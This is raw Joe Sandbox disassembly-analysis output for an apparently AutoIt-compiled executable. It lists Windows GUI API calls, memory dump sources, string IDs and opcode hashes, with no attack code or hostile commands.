                                              • Opcode Fuzzy Hash: fa54b2223e3d11fd21be7ee1bea13415dac198f18d39d9331ec2dd86b810a3d3
                                              • Instruction Fuzzy Hash: 0902CD70908301AFD725CF18C888BFABBE4FF89714F0485A9F995972A1CBB5D944CB52
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00BBAF51
                                              • SetTextColor.GDI32(?,?), ref: 00BBAF55
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BBAF6B
                                              • GetSysColor.USER32(0000000F), ref: 00BBAF76
                                              • CreateSolidBrush.GDI32(?), ref: 00BBAF7B
                                              • GetSysColor.USER32(00000011), ref: 00BBAF93
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BBAFA1
                                              • SelectObject.GDI32(?,00000000), ref: 00BBAFB2
                                              • SetBkColor.GDI32(?,00000000), ref: 00BBAFBB
                                              • SelectObject.GDI32(?,?), ref: 00BBAFC8
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BBAFE7
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BBAFFE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BBB013
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BBB05F
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BBB086
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00BBB0A4
                                              • DrawFocusRect.USER32(?,?), ref: 00BBB0AF
                                              • GetSysColor.USER32(00000011), ref: 00BBB0BD
                                              • SetTextColor.GDI32(?,00000000), ref: 00BBB0C5
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BBB0D9
                                              • SelectObject.GDI32(?,00BBAC1F), ref: 00BBB0F0
                                              • DeleteObject.GDI32(?), ref: 00BBB0FB
                                              • SelectObject.GDI32(?,?), ref: 00BBB101
                                              • DeleteObject.GDI32(?), ref: 00BBB106
                                              • SetTextColor.GDI32(?,?), ref: 00BBB10C
                                              • SetBkColor.GDI32(?,?), ref: 00BBB116
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: 87bfaa6c2c188dce75d337170f2e77e991cddf0c329259dd327412d7a8f41898
                                              • Instruction ID: cd6b266e0781a6ddfe98929781246b63ef0e49e4b0722f63db4bfdbbaafbaa57
                                              • Opcode Fuzzy Hash: 87bfaa6c2c188dce75d337170f2e77e991cddf0c329259dd327412d7a8f41898
                                              • Instruction Fuzzy Hash: 3D614C71910218EFDF11AFA4DC88EEEBBB9EF08320F154155F915AB2A1DBB59940CF90
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BB90EA
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB90FB
                                              • CharNextW.USER32(0000014E), ref: 00BB912A
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BB916B
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BB9181
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB9192
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BB91AF
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BB91FB
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BB9211
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB9242
                                              • _memset.LIBCMT ref: 00BB9267
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BB92B0
                                              • _memset.LIBCMT ref: 00BB930F
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BB9339
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BB9391
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00BB943E
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BB9460
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB94AA
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB94D7
                                              • DrawMenuBar.USER32(?), ref: 00BB94E6
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BB950E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: f57cbd95c1b0c4bad8869b16a70f106952ff19b1ec67e1a81f4c27b198505f94
                                              • Instruction ID: bcc1471029ee04cb43bfbf605f148a2a9e239f4fb2ede5b01708c608e60d28ac
                                              • Opcode Fuzzy Hash: f57cbd95c1b0c4bad8869b16a70f106952ff19b1ec67e1a81f4c27b198505f94
                                              • Instruction Fuzzy Hash: 3AE16071904209ABDB21AF55CC84EFE7BF8EF09710F1081D5FA15AB291DBB08A85DF61
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00BB5007
                                              • GetDesktopWindow.USER32 ref: 00BB501C
                                              • GetWindowRect.USER32(00000000), ref: 00BB5023
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BB5085
                                              • DestroyWindow.USER32(?), ref: 00BB50B1
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BB50DA
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB50F8
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BB511E
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00BB5133
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BB5146
                                              • IsWindowVisible.USER32(?), ref: 00BB5166
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BB5181
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BB5195
                                              • GetWindowRect.USER32(?,?), ref: 00BB51AD
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00BB51D3
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00BB51ED
                                              • CopyRect.USER32(?,?), ref: 00BB5204
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00BB526F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: 92a551268ed94fcdc95afd6a4f388b4fbe9da0964f2caa0f972cb5ad45f1a27a
                                              • Instruction ID: 66e1e1c9130f573171fea852b381ab492c0c3556d5a2f16665665d6585489899
                                              • Opcode Fuzzy Hash: 92a551268ed94fcdc95afd6a4f388b4fbe9da0964f2caa0f972cb5ad45f1a27a
                                              • Instruction Fuzzy Hash: CAB18D71614740AFD714DF64C884BAABBE4FF88310F008A5DF5999B291DBB1EC05CB92
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B9499C
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B949C2
                                              • _wcscpy.LIBCMT ref: 00B949F0
                                              • _wcscmp.LIBCMT ref: 00B949FB
                                              • _wcscat.LIBCMT ref: 00B94A11
                                              • _wcsstr.LIBCMT ref: 00B94A1C
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B94A38
                                              • _wcscat.LIBCMT ref: 00B94A81
                                              • _wcscat.LIBCMT ref: 00B94A88
                                              • _wcsncpy.LIBCMT ref: 00B94AB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: e3d7731e7b2a52c75ba22c74bc6f035fef8810a455d168a7221ed5d4cf353776
                                              • Instruction ID: e1addf74b2e2aa40beaea3733bbf0f6c1aab2633264583dc94be1ef3ab5ec479
                                              • Opcode Fuzzy Hash: e3d7731e7b2a52c75ba22c74bc6f035fef8810a455d168a7221ed5d4cf353776
                                              • Instruction Fuzzy Hash: 2F41F572A00304BBDB15B7649C43FBF7BECDF45761F0004E9FE04A6192EB349A0696A5
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B32C8C
                                              • GetSystemMetrics.USER32(00000007), ref: 00B32C94
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B32CBF
                                              • GetSystemMetrics.USER32(00000008), ref: 00B32CC7
                                              • GetSystemMetrics.USER32(00000004), ref: 00B32CEC
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B32D09
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B32D19
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B32D4C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B32D60
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00B32D7E
                                              • GetStockObject.GDI32(00000011), ref: 00B32D9A
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B32DA5
                                                • Part of subcall function 00B32714: GetCursorPos.USER32(?), ref: 00B32727
                                                • Part of subcall function 00B32714: ScreenToClient.USER32(00BF77B0,?), ref: 00B32744
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000001), ref: 00B32769
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000002), ref: 00B32777
                                              • SetTimer.USER32(00000000,00000000,00000028,00B313C7), ref: 00B32DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: 6787a6b98485ac3e40a263ada3b74736fc2bc191e6eb89e18c18a233a5b6b2af
                                              • Instruction ID: 150c8c30be1b309ec3888facdeaaa86554c6a374ee80170f201e006c99256520
                                              • Opcode Fuzzy Hash: 6787a6b98485ac3e40a263ada3b74736fc2bc191e6eb89e18c18a233a5b6b2af
                                              • Instruction Fuzzy Hash: 97B13C7165020AEFDB14EFA8DC99BBD7BF4FB08310F2041A9FA55A7290DB74A850CB54
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • GetForegroundWindow.USER32(00BC0980,?,?,?,?,?), ref: 00B504E3
                                              • IsWindow.USER32(?), ref: 00B866BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Foreground_memmove
                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                              • API String ID: 3828923867-1919597938
                                              • Opcode ID: 93b36b1e5342dfb869a24bfc338d901863c9451c1cb9b23dcfde3492d12cf048
                                              • Instruction ID: 95b292e7155edb5b77b4f0da6d2b5a41b6865d38295f4afc535d83d55d2ead84
                                              • Opcode Fuzzy Hash: 93b36b1e5342dfb869a24bfc338d901863c9451c1cb9b23dcfde3492d12cf048
                                              • Instruction Fuzzy Hash: BDD19030504242DBCB04FF24C581AAABBF5FF54344F104AE9F855976B2DB30EA99CB92
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BB44AC
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BB456C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-719923060
                                              • Opcode ID: 05ac15d9fb4ffa1467913bea4b6517be2369ed3e0849d359a0bc9c231bb961b8
                                              • Instruction ID: 4bf8ce452a4c53a66be5532bff732f8cbabe3a0890e5bce9d96696b0df009d90
                                              • Opcode Fuzzy Hash: 05ac15d9fb4ffa1467913bea4b6517be2369ed3e0849d359a0bc9c231bb961b8
                                              • Instruction Fuzzy Hash: 84A13D302146419BCB14EF24C991ABAB7E5FF95314F2049E8B8A69B3E2DF70ED05CB51
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00BA56E1
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00BA56EC
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BA56F7
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00BA5702
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00BA570D
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00BA5718
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00BA5723
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00BA572E
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00BA5739
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00BA5744
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00BA574F
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00BA575A
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00BA5765
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00BA5770
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00BA577B
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00BA5786
                                              • GetCursorInfo.USER32(?), ref: 00BA5796
                                              • GetLastError.KERNEL32(00000001,00000000), ref: 00BA57C1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: f38d87e93c15662cd3373c030c52b644b90b8c213b0678d5e3b5f8764591b35e
                                              • Instruction ID: 4b6e77f87c4bcfd19e90d651c78dbccf84a1720f780b5e0b5728d8e4add0d50b
                                              • Opcode Fuzzy Hash: f38d87e93c15662cd3373c030c52b644b90b8c213b0678d5e3b5f8764591b35e
                                              • Instruction Fuzzy Hash: 97415870D08319AADB109FB68C49D6FFEF8EF55B10B10456FE509E7290DA786901CE51
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00B8B17B
                                              • __swprintf.LIBCMT ref: 00B8B21C
                                              • _wcscmp.LIBCMT ref: 00B8B22F
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B8B284
                                              • _wcscmp.LIBCMT ref: 00B8B2C0
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00B8B2F7
                                              • GetDlgCtrlID.USER32(?), ref: 00B8B349
                                              • GetWindowRect.USER32(?,?), ref: 00B8B37F
                                              • GetParent.USER32(?), ref: 00B8B39D
                                              • ScreenToClient.USER32(00000000), ref: 00B8B3A4
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00B8B41E
                                              • _wcscmp.LIBCMT ref: 00B8B432
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00B8B458
                                              • _wcscmp.LIBCMT ref: 00B8B46C
                                                • Part of subcall function 00B5385C: _iswctype.LIBCMT ref: 00B53864
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: 45803fa8c93fe8701e00e3083435a652aa1a196d804f034a1dc941a33d5c5bb9
                                              • Instruction ID: 72c5661ff9e3e19692a242a6815065975af2a346275aeaf4cc9101a3e5ff9792
                                              • Opcode Fuzzy Hash: 45803fa8c93fe8701e00e3083435a652aa1a196d804f034a1dc941a33d5c5bb9
                                              • Instruction Fuzzy Hash: 7CA1D171204206EFDB14EF74C885FAAB7E8FF48354F048669F999D22A1DB30E955CB90
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00B8BAB1
                                              • _wcscmp.LIBCMT ref: 00B8BAC2
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B8BAEA
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00B8BB07
                                              • _wcscmp.LIBCMT ref: 00B8BB25
                                              • _wcsstr.LIBCMT ref: 00B8BB36
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00B8BB6E
                                              • _wcscmp.LIBCMT ref: 00B8BB7E
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B8BBA5
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00B8BBEE
                                              • _wcscmp.LIBCMT ref: 00B8BBFE
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00B8BC26
                                              • GetWindowRect.USER32(00000004,?), ref: 00B8BC8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: 52798c533abf78a93894e9ad087f0a44b4c5e8073b7f6af23c85143539a9be0b
                                              • Instruction ID: 2458d59dff77a883fe42b1ea58914f820c184e95f3562c5fc1cd5332e58afb0b
                                              • Opcode Fuzzy Hash: 52798c533abf78a93894e9ad087f0a44b4c5e8073b7f6af23c85143539a9be0b
                                              • Instruction Fuzzy Hash: E98191710043059BDB14EF24C885FAA7BE8FF48754F1485EAFD899A0A6DB30DE49CB61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: 0c7fe752a5d2a940a2a28ebf452286a22ddf5040090cf34a90ddaa5b06c144fc
                                              • Instruction ID: d934ececcefc7af7fe91e425203eb5091e3a789c6438039d35a89599646785d9
                                              • Opcode Fuzzy Hash: 0c7fe752a5d2a940a2a28ebf452286a22ddf5040090cf34a90ddaa5b06c144fc
                                              • Instruction Fuzzy Hash: 9231CD70A40245AACB14FBA5CD93EAD77F8AF20790F2005E5F941B10F2EF666F48D652
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00B8CBAA
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B8CBBC
                                              • SetWindowTextW.USER32(?,?), ref: 00B8CBD3
                                              • GetDlgItem.USER32(?,000003EA), ref: 00B8CBE8
                                              • SetWindowTextW.USER32(00000000,?), ref: 00B8CBEE
                                              • GetDlgItem.USER32(?,000003E9), ref: 00B8CBFE
                                              • SetWindowTextW.USER32(00000000,?), ref: 00B8CC04
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B8CC25
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B8CC3F
                                              • GetWindowRect.USER32(?,?), ref: 00B8CC48
                                              • SetWindowTextW.USER32(?,?), ref: 00B8CCB3
                                              • GetDesktopWindow.USER32 ref: 00B8CCB9
                                              • GetWindowRect.USER32(00000000), ref: 00B8CCC0
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B8CD0C
                                              • GetClientRect.USER32(?,?), ref: 00B8CD19
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B8CD3E
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B8CD69
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID:
                                              • API String ID: 3869813825-0
                                              • Opcode ID: 14980f0ac3fb466544869b82f73ddc8869652c1628242f8cfd5dd4e06c917469
                                              • Instruction ID: 257f1bc346331546da88aba676e730dfd621b1311d2b76812d19b8daa6bd48a7
                                              • Opcode Fuzzy Hash: 14980f0ac3fb466544869b82f73ddc8869652c1628242f8cfd5dd4e06c917469
                                              • Instruction Fuzzy Hash: 34514D70900709EFDB20AFA8CE85F6EBBF5FB08705F000569E556A35A0CB74A954CF50
                                              APIs
                                              • _memset.LIBCMT ref: 00BBA87E
